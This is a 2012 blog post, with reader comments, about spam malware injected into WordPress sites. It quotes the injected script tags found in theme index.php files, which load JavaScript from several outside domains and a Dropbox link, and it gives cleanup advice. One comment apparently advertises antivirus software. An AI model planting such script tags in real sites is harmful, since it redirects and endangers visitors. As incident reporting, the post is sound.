Tuesday, April 10, 2012

new wordpress spam malware

update 14th april 2012 . this malware now has jumped to
 script type="text/javascript" src="http://jacintocosta.com.br/apache/ " >   < / script
just found hxxp://www.juste-been-paid.kit.net/ popping up when clicking on wp stats from jetpack

and the code in the index.php

<   script type="text/javascript" src="http://geistsweden.eu/wp-cache/" >


it looks like it was not realated to wp stats but when ever any space on the home page was clicked it sent the user to the link above

6 comments:

  1. Is there anyway to solve this issue?

    ReplyDelete
  2. change password and then goto your dashboard and then edit the index.php file and remove the line above

    ReplyDelete
  3. Hi and thank you very much. I think you have to remove s c r i p t type="text/javascript" src="http://halldor.is/_inf/"> < / script>) also.
    You can check your website with this tool:
    http://sitecheck.sucuri.net/scanner/?scan=http://yourweb.com

    Regards

    ReplyDelete
  4. I had to search my entire WP site and found " h t t p : //dl.dropbox.com/u/74575063/clickpop.js" in my themes .index.php. Deleted that and all's good once again.

    ReplyDelete
  5. I'm using AVG protection for a few years, I'd recommend this product to all of you.

    ReplyDelete